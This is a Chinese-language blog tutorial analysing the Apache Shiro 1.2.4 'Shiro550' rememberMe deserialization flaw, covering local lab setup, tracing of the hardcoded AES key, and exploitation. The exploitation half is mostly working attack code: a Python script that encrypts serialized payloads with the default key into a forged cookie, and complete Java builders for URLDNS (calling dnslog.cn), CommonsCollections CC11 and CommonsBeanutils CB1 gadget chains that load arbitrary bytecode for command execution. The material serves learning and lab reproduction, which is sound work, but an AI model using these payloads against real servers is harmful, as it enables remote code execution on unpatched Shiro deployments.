本文主要是介绍Shiro反序列化漏洞-Shiro550流程分析,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
Apache Shiro是一个开源框架,这个漏洞在2016就被披露了。Shiro框架使用广泛,漏洞影响范围广。
环境搭建
这里我使用的是IDEA 2023.3.5
环境下载
这里就不配图片了,具体操作可以搜索引擎
tomcat 8.5.76 下载地址:
https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.76/bin/apache-tomcat-8.5.76-windows-x86.zip
JDK1.7下载地址:
https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html
下载shiro对应的war包
https://github.com/jas502n/SHIRO-550/blob/master/samples-web-1.2.4.war
shrio复现的对应源码:
https://codeload.github.com/apache/shiro/zip/shiro-root-1.2.4
过程
首先IDEA Open 打开shiro 源码的项目,如图路径
在pom.xml中找到如图对应的代码添加这一行,最后重新加载 Maven项目
<groupId>javax.servlet</groupId><artifactId>jstl</artifactId><version>1.2</version> //添加的这一行代码<scope>runtime</scope>
然后 Ctrl +Shift +S 配置当前项目的JDK 版本为1.7
如图打开设置
我这里已经配好了,就是把Tomcat的安装路径放到里面就可以了
然后来到这里
放入下载好的war包
然后配置这些就可以了
运行之后可以看见和下面图片一样的,说明Shiro550复现环境搭建成功了
原理分析
Cookie的源头
当登录框勾选 Remember Me(记住密码)的时候
当登陆成功的时候,服务器的Cookie的 remeberMe字段下的值会返回一段字符串。而这个字符串很像加密过的,很长的话一般说明了保存了写信息什么的,而且也比较特殊,比如序列化什么的
这个时候我们可以来到源码中搜索一下Cookie,Ctrl +N键搜索名字有关的类。IDEA会列出这些
在这里我们看见了和Cookie有关的类名,而且这个包还是 shiro 1.2.4,点进去看一下
这个方法的意思是:获取反序列化标识符
追踪这个方法,来到了这里
这个 convertBytesToPrincipals 方法名的意思是大概是字节转换,可能涉及序列化,追踪这个方法看一下。
可以看见它涉及到了解密以及解密序列化的方法
反序列化的入口点
点进去先看一下这个方法
可以发现它是一个接口
最后发现是这个接口方法调用了 readObject方法
通过这个方法的分析我们可以发现,我们可以传入一个序列化的数据,然后服务器通过解密然后反序列化后最后执行我们的代码。
解密方法的逆分析
我们已经知道了反序列化可能存在漏洞的大概流程,现在分析一下 decrypt 这个方法的解密流程。
encrypted大概是要解密的序列化字节,而右边的 getDecryptionCipherKey方法应该是获取密钥的意思,点击这个方法
然后继续追踪方法的调用,点击 setDecryptionCipherKey方法
来到这里发现 setDecryptionCipherKey 方法是来自 setCipherKey 方法调用的,追踪该方法
这个方法的意思大概是设置密钥,也就是说开发者设置好了固定的密钥的值,我们点进去看一下
发现这个值是一个常量
通过注解的意思发现这个密钥首先通过了 AES加密,然后又进行了base64的加密。
漏洞利用
我们根据 Cookie的加密原理,可以利用下面这个Cookie加密脚本
- 依赖安装
pip install pycryptodome
pip install pycryptodomex
Cookie加密脚本:
from email.mime import base
from pydoc import plain
import sys
import base64
import uuid
from random import Random
from Cryptodome.Cipher import AESdef get_file_data(filename):with open(filename, 'rb') as f:data = f.read()return datadef aes_enc(data):BS = AES.block_sizepad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()key = "kPH+bIxk5D2deZiIxcaaaA=="mode = AES.MODE_CBCiv = uuid.uuid4().bytesencryptor = AES.new(base64.b64decode(key), mode, iv)ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(data)))return ciphertextdef aes_dec(enc_data):enc_data = base64.b64decode(enc_data)unpad = lambda s: s[:-s[-1]]key = "kPH+bIxk5D2deZiIxcaaaA=="mode = AES.MODE_CBCiv = enc_data[:16]encryptor = AES.new(base64.b64decode(key), mode, iv)plaintext = encryptor.decrypt(enc_data[16:])plaintext = unpad(plaintext)return plaintextif __name__ == "__main__":data = get_file_data("ser.bin")print(aes_enc(data))# 同目录下放已经反序列化的文件ser.bin,通过AES和BASE64加密生成rememberMe的cookie
我们可以安装一个插件 Maven Helper
来到 pom.xml 这个插件主要的作用是依赖分析,我们打cc链的时候只能打 runtime 和 compile,不能打 test
实际上 还有一个cb链可以打
URLDNS链
因为 URLDNS 链是JDK自带的,不需要依赖,但是只能进行SSRF,不能RCE。
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;public class URLDNS {public static void serialize(Object obj) throws IOException {ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));oos.writeObject(obj);}public static void main(String[] args) throws Exception{HashMap<URL,Integer> hashmap= new HashMap<URL,Integer>();URL url = new URL("http://dnslog.cn");setFieldValue(url,"hashCode",1);hashmap.put(url,1);setFieldValue(url,"hashCode",-1);serialize(hashmap);}public static void setFieldValue(Object obj, String fieldName, Object value)throws Exception{Field field = obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj,value);}}序列化好 urldns链之后,就有了一个ser.bin文件,这个时候运行 shrio550的加密cookie脚本。
登陆进去之后,可以看见 我们要替换的是 rememberMe后面的一丢字符串
这里要删掉 JSESSIONID,因为它属于Cookie验证的一种,如果它在的话,代码逻辑就不会走到 rememberMe里了。
替换 rememberMe的值为我们生成的cookie,可以发现URLdns链执行成功
CC11
这条链子,具体可以参考我写过的CC11分析:
https://blog.csdn.net/weixin_53912233/article/details/138536622
Shrio 本身没有Commons Collections3.2.1,而且还是 test的
这里我们添加 Commons Collections3 的依赖
<dependency><groupId>org.ow2.util.bundles</groupId><artifactId>commons-collections-3.2.1</artifactId><version>1.0.0</version></dependency>
然后重新进入IDEA,可以发现这个依赖理论上是可以打的了
这里可以利用CC11链子的特性,无数组
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;public class C11 {public static void main(String[] args) throws Exception{TemplatesImpl templates = new TemplatesImpl();Class<? extends TemplatesImpl> tc = templates.getClass();Field name = tc.getDeclaredField("_name");name.setAccessible(true);name.set(templates,"a");Field bytecodes = tc.getDeclaredField("_bytecodes");bytecodes.setAccessible(true);byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));byte[][] codes = {eval};bytecodes.set(templates,codes);Field tfactory = tc.getDeclaredField("_tfactory");tfactory.setAccessible(true);tfactory.set(templates,new TransformerFactoryImpl());//初始化加载类
// templates.newTransformer();InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", null, null);HashMap<Object, Object> hashMap = new HashMap<>();Map lazymap = LazyMap.decorate(hashMap,new ConstantTransformer(1));TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,templates);// tiedMapEntry.getValue(); hashCode代替lazymap.put(tiedMapEntry,null);lazymap.remove(templates);Class<LazyMap> lazyMapClass = LazyMap.class;Field factory = lazyMapClass.getDeclaredField("factory");factory.setAccessible(true);factory.set(lazymap,invokerTransformer);serialize(hashMap);unserialize("ser.bin");}public static void serialize(Object obj) throws IOException{ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));oos.writeObject(obj);}public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));Object obj = ois.readObject();return obj;}}
可以看见命令执行成功了,这里的Tomcat服务器使用jdk8u65才能用CC11打,低版本不行
CB1链
Shrio 本身自带CB的依赖,我们可以用CB1链子去打一下试试
CB1的链子分析可以参考我写过的这篇:
https://blog.csdn.net/weixin_53912233/article/details/138661173
CB1EXP代码:
package CB;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.commons.beanutils.PropertyUtils;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ConstantTransformer;import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;public class Bean {public static void main(String[] args) throws Exception {//CC3尾部链TemplatesImpl templates = new TemplatesImpl();Class<? extends TemplatesImpl> c = templates.getClass();Field name = c.getDeclaredField("_name");name.setAccessible(true);name.set(templates,"a");Field bytecodes = c.getDeclaredField("_bytecodes");bytecodes.setAccessible(true);byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));byte[][] codes = {eval};bytecodes.set(templates,codes);Field tfactory = c.getDeclaredField("_tfactory");tfactory.setAccessible(true);tfactory.set(templates,new TransformerFactoryImpl());TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);BeanComparator beanComparator = new BeanComparator("outputProperties");//CC2 部分的 优先队列priorityQueue.add(templates);priorityQueue.add(1);Class<? extends PriorityQueue> pc = priorityQueue.getClass();Field comparator = pc.getDeclaredField("comparator");comparator.setAccessible(true);comparator.set(priorityQueue,beanComparator);serialize(priorityQueue);unserialize("ser.bin");}public static void serialize(Object obj) throws IOException{ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));oos.writeObject(obj);}public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));Object obj = ois.readObject();return obj;}}
替换 rememberMe的值,可以看见命令执行成功
总结
Shiro <=1.24 版本,密钥是默认的,这个时候我们可以利用 AES加密+base64加密 序列化的payload。利用服务器自带依赖去打,才能成功。
Cookie 中为 rememberMe值,需要注意下,是否存在漏洞。
这篇关于Shiro反序列化漏洞-Shiro550流程分析的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
